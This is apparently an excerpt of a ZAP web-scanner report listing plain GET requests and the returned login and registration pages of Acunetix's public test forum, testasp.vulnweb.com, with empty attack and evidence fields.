<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
